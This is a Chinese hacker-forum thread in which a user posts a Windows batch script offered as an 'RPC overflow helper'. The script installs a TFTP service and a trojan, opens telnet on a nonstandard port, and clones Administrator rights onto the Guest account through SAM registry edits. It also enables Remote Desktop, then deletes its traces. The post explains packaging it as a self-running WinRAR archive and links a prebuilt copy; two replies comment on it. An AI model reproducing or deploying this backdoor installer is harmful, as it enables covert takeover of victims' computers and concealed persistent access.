20CN网络安全小组论坛 - 菜鸟乐园

论坛: 菜鸟乐园标题: rpc溢出辅助工具

作者: txhak [txhak]

论坛用户

rem =======write by 铁血=====
@echo off
rem ========安装tftp服务======
copy tftpd.exe  %systemroot%\system32
instsrv tftp c:\winnt\system32\tftpd.exe
net start tftp

rem ========安装木马程序======
copy server.exe  %systemroot%\system32
server
copy tftpserv.exe %systemdrive%\tftpdroot /y

del /q /f  instsrv.exe
del /q tftpd.exe
del /q server.exe
del /q /f tftpserv.exe

set ph=%CD%
cd /d %systemroot%\system32

rem ========安装telnet服务======
net stop telnet
echo Windows Registry Editor Version 5.00 >telnet.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\1.0] >> telnet.reg
echo "NTLM"=dword:00000001   >>telnet.reg
echo "TelnetPort"=dword:0000206D    >>telnet.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tlntsvr]   >>telnet.reg
echo "Type"=dword:00000010  >>telnet.reg
echo  "Start"=dword:00000002  >>telnet.reg
regedit /s telnet.reg
net start telnet

rem ========克隆用户======
net user guest txhak
net user guest /active:no
echo Windows Registry Editor Version 5.00    >txhak.reg
echo.      >>txhak.reg
echo [HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F5]     >>txhak.reg
regedit /e Y1f4.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4
regedit /e Y1f5.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F5
more +3 <Y1f4.reg      >>txhak.reg
more +7 <Y1f5.reg      >>txhak.reg
regedit /s txhak.reg

del /q /f telnet.reg
del /q /f Y1f4.reg
del /q /f  Y1f5.reg
del /q /f  txhak.reg

rem ========安装3389终端服务======
echo [Components] > syslog
echo TSEnable = on >> syslog
start /b sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\winnt\system32\syslog /q

del /q /f  %ph%tftps.bat

exit

rem 将该文件保存为tftps.bat，并将instsrv,tftpd,server都放在一起，添加到winrar自解压文件，设置winrar解压后执行tftps.bat
做好的：http://txhak.5inet.cn

地主发表时间: 08/18 11:15

回复: wyz2003wg [wyz2003wg]

论坛用户

有点烦。不过管用。我顶！~~

B1层发表时间: 08/18 13:29

回复: tommy_he [tommy_he]

版主

不现实！如果用于98就没有任何作用了！

B2层发表时间: 08/19 03:38

论坛: 菜鸟乐园